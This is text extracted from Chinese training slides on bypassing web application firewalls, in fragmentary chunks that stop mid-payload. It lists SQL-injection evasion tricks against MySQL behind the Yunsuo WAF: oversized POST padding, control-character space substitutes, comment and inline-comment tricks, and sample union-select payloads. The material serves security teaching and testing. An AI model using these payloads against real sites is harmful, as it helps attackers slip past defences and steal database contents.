WAF绕过系列第三节课

1、WAF Bypass实战系列 讲师：zp,声明,2,目录,3,1、 WAF绕过方法详解,2、Bypass云锁Mysql数据库注入,1 WAF绕过方法详解,原理续集,4,WAF 绕过角度,5,规则缺陷/特性,架构,协议,规则缺陷/特性,WAF资源限制角度 假如HTTP请求POST BODY太大，检测所有的内容，WAF集群消耗太大的CPU、内存资源。因此许多WAF只检测前面2M、或4M的内容。对于攻击者而然，只需要在POST BODY前面添加许多无用数据，把攻击payload放在最后即可绕过WAF检测。,6,规则缺陷/特性,Urlencode特性,7,2 Bypass云锁Mysql数据库注入,实战

2、Bypass,8,MYSQL特性,9,select id,contents,time from news where news_id=1unionselect1,2,db_name()fromadmin 位置一 可利用其他控制字符替换空格：%09,%0a,%0b,%0c,%0d,%20,%a0 可利用注释符号：/*/、#test%0d%0a、 -+a 可利用数学运算以及数据类型：news_id=1.1，news_id=1E0，news_id=N 位置二 可利用其他控制字符替换空格：%09,%0a,%0b,%0c,%0d,%20,%a0。 可利用注释符号：/*/、 #test%0d%0a、 -+

3、a 可利用括号：union(select 1,2) 位置三 可利用其他控制字符替换空格：%09,%0a,%0b,%0c,%0d,%20,%a0 可利用注释符号：/*/、 #test%0d%0a、 -+a 可利用其他符号：+ 、- 、 、!、,MYSQL特性,10,位置四 可利用其他控制字符替换空格： %09,%0a,%0b,%0c,%0d,%20,%a0 可利用注释符号： /*/、#test%0d%0a、 -+a 可利用数学运算以及数据类型： union select user(),2.0from admin union select user(),8e0from admin union se

4、lect user(),Nfrom admin 位置五 可利用其他控制字符替换空格： %09,%0a,%0b,%0c,%0d,%20,%a0 可利用注释符号： /*/、#test%0d%0a、-+a 号：union select 1 schema_name frominformation_schema.SCHEMATA limit 0,1) 内联注释：union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/ limit 0,1),MYSQL特性,11,号： id=1 union select 1,(select(schema_name)from x information_schema.SCHEMATA limit 0,1) (号：id=1 union select 1,(select(schema_nam